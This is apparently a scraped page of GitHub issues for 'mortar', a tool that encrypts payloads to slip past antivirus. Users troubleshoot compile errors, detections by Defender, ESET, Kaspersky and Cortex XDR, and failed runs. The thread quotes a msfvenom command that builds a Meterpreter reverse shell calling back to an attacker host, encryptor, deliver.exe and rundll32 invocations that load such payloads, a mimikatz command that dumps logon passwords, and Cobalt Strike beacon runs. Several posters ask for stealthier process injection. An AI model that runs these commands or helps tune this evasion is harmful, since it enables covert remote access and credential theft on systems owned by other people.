0xsp-srd / mortar Goto Github PK

Hi, ESET detected the payload , upx just made it worse lol :(

Both agressor and deliver are detected by windows defender.

First, I tried to encrypt an exe the encryptor works fine but when I load it in the target machine it loads and it doesn't show errors but when I get back to the attacker machine nothing happened.
Second , I tried to use the shellcode by following the instruction in https://0xsp.com/offensive/mortar-loader-v2/ and it not working again please review your code.
Note : I've tried both in a windows target.

Is there a way to have the compile instructions?
Lazarus project doesnt really provides instructions on how to compile a project. Neither the github for this release.

While compiling agressor with the release version, it shows three lines error.

syscalls.RPM(PI.hProcess, Pointer(CONT.rdx + $100), @addr, 4, Ret);
// runner.pas(134,52) Error: identifier idents no member "rdx"

syscalls.W_M(PI.hProcess, LPVOID(CONT.rdx + $10), @ImageBASE, 8, Ret);
// runner.pas(179,53) Error: identifier idents no member "rdx"

CONT_B.rcx := dword64(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
// runner.pas(190,22) Error: identifier idents no member "rcx"

I'm running a fresh Windows 10, updated, with all Defender protection disabled for testing.

OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044

I can't seem to get the shellcode or shell binary to execute.

For example, create shell...

root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.x.x.x LPORT=8080 -f exe -o shell64.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 713 bytes
Final size of exe file: 7168 bytes
Saved as: shell64.exe

At this point, manually executing the binary connects fine: Meterpreter session 1 opened (172.x.x.x:8080 -> 127.0.0.1)

However, encrypting and running with rundll32 doesn't work...

C:\Users\user\Desktop>C:\Users\user\Documents\GitHub\mortar\Encryptor\encryptor.exe -f shell64.exe -o bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to bin.enc

C:\Users\user\Desktop> rundll32.exe agressor.dll,start

At this point, I don't see any network traffic on the victim host.

It appears to trigger werfault.exe

C:>deliver.exe -d -f bin.enc
Exception at 0000000100010930: EReadError:
Stream read error

there is little problem in your Readme , it is "sekurlsa::logonpasswords "" not "sekurlasa::logonpasswords"
deliver.exe -d -c sekurlasa::logonpasswords -f mimikatz.enc --->deliver.exe -d -c sekurlsa::logonpasswords -f mimikatz.enc

and then.. I want to confirm one thing . i test this command deliver.exe -d -c version -f bin.enc and it execute successful . But trigger the karspersky (may be memory scan) after a few seconds , You also tested this mentioned in your article and didn't this problem occur at the time?

Hi,
Mortar is a awesome project! But, I have some trouble that i get a error with "encryptor has not main source file" when i use kail to build the encryptor project. I don't know why. Can you provide a encryptor file and a calc.enc file ? Thank you please ~

i've got the bin.enc but where is dll

Hi,

Firstly, absolutely love the work! Very much appreciate it.

Is there anyway to make the injection process stealthier? At the moment, a cmd window is launched and simply stays there, closing it also ends the meterpreter session. I've attempted to recompile the loader and inject into different processes such as 'svchost.exe' and 'explorer.exe' via

bin_decryptor('c:\\windows\\explorer.exe'); or fork_P_x64('C:\\windows\\explorer.exe',runner.TByteArray(AMemStr2.memory),processhandle);

yet only the CMD window opens and nothing else, and again closing the CMD window ends the session.

also, I know literally nothing about the pascal language

I'm pretty new to Lazarus/Pascal. What's going on here?

Does this work on dotnet payloads, I also have issues following the readme, I conpiled each of them in their individual folders, but i still couldn't figure out how to use it. I don't know pascal programming language.

Hello, the dll was deleted by defander, the enc file was not deleted

deliver.exe is detected by AV and deleted. Whenever I try to run agressor.dll I get this:

you able to pass commands for the loaded binary

you deleted the exe, how do i pass the command

I need the program to receive commands

bin.enc is an encrypted CS Beacon, tried to create the following batch file and launch it.

@echo off
cmd.exe /c rundll32.exe agressor.dll,stealth

Beacon connection was failed and Cortex XDR blocked with "Rule ioc.cobalt_strike_named_pipe"

Any idea? Thanks.

From today Microsoft defender started detecting it as Virus tool with label VirTool/Win64Mortar :\

Hello lawrenceamer, hope you are well.
I have a question, how can I call the export function "dec" and execute it when I injected the dll into "cmd.exe" process, or what is the technique, the reflective injector you are used to do that.
because when I injected the dll into the cmd.exe process it is just injected and didn't execute "dec" function to run the ".enc" payload.

The IDE claims that "runner" was not found. The folder "..\Lib" is imported and the files are there.

I'm having the same issue as nathan-bowman. The encryptor works. I compile the DLL, but I can't run it. I have compiled it on 3 different systems (all windows x64-one windows 10, two windows 11, one bare-metal two VM's). I've tried to run it with the mimikats.enc. (rundll32.exe agressor.dll,start), also on multiple machines. Nothing happens.

Hi, this works amazingly well with mimikatz against multiple antivirus products that i have tested. (Windows Defender, McAfee, Eset, Norton, Bitdefender and Avast)

But i still have a question, is there a way where we could apply this technique to other tools that run once, such as WinPEAS or PowerUp?

Following situation, I'm generating a Windows Executable through Cobalt Strike, then I encrypt that file with the encrypter and load it with deliver.exe . AV did not recognize anything, beacon connects and then exits pretty fast after calling home

[*] Tasked beacon to run: whoami
[+] host called home, sent: 45 bytes
[+] beacon exit.

Tried multiple times but no chance to get it working, any idea?